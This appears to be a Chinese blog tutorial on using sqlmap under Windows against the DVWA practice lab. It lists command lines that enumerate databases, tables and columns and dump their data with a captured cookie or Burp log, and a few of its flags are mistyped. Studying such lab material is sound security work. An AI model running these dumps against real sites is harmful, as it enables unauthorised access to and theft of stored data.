window下使用sqlmap探測sql注入漏洞

2021-10-22 21:30:07 字數 2126 閱讀 3967

sql注入:攻擊者用非法的引數向服務端執行資料,服務端沒有對輸入進行校驗就直接執行了攻擊者輸入的非法操作,從而產生sql注入

在python資料夾中放入sqlmap資料夾 後進入cmd 找到資料夾後執行python sqlmap.py

這裡對dvwa靶場進行操作

cookie,指某些**為了辨別使用者身份、進行 session 跟蹤而儲存在使用者本地終端上的資料

需要登入才能進行操作的**查詢sql注入漏洞。必須獲取到cookie值

或者bp抓包 get型別

有四種型別注入

dump 資料庫中資料表中資料: --dump-all

python  sqlmap.py    -u  "url" --cookie=""         --dbs
python  sqlmap.py    -u  "url" --cookie=""         --dump
python  sqlmap.py    -u  "url" --cookie=""      -talbes                   所有資料庫以及裡面的表
python  sqlmap.py    -u  "url" --cookie=""     -d 資料庫名   -tables                     當前資料庫以及裡面的表
python  sqlmap.py    -u  "url" --cookie=""     -d 資料庫名   -t  表名   -columns     爆出字段
python  sqlmap.py    -u  "url" --cookie=""     -d 資料庫名   -t  表名   -c 欄位1,欄位2  -dump   爆出字段對應的明文

python  sqlmap.py   -r  1.txt   --dbs

python  sqlmap.py  -u "" --data="id=1&submit=%e6%9f%a5%e8%af%a2" --dbs  --level 3 --risk 3 --batch
或者直接放到txt裡

生成的burp.log和sqlmap.py 放在同一目錄

然後就去抓包

抓包完 log 就記錄了資料

然後開始跑

python  sqlmap.py  -l  burp.log --batch -smart     --level  3  --risk  3
總結,有登入介面先,就抓包拿cookie 然後get型別就cookie=「」,post型別就data=「id」,或者直接全部丟到txt裡跑,配合burp的抓包日誌批量跑也可

window下Redis安裝使用

一 redis簡介 redis是乙個開源的,使用c語言編寫,面向 鍵 值 對型別資料的分布式nosql資料庫系統,特點是高效能,持久儲存,適應高併發的應用場景。redis純粹為應用而產生,它是乙個高效能的key value資料庫,並且提供了多種語言的api。redis是乙個支援持久化的記憶體資料庫,...

window下安裝使用virtualenv

window下安裝使用virtualenv 本文為大家介紹的是如何在window下安裝使用virtualenv的方法,感興趣的同學參考下。要在windows用 virtualenv,網上多是在linux下的教程,所以總結了一下.virtualenv zip包本身包括easyinstall和pip包,...

window環境下使用Apache mod jk

1 mod jk是什麼?apache自身是用來載入靜態頁面的,如果要載入動態頁面比如jsp,還要做與tomcat的整合,mod jk就是整合apache2.4與tomcat的聯結器。2 apache tomcat mod jk之間的關係 apache 這裡指的是httpd,web伺服器,用來處理靜態...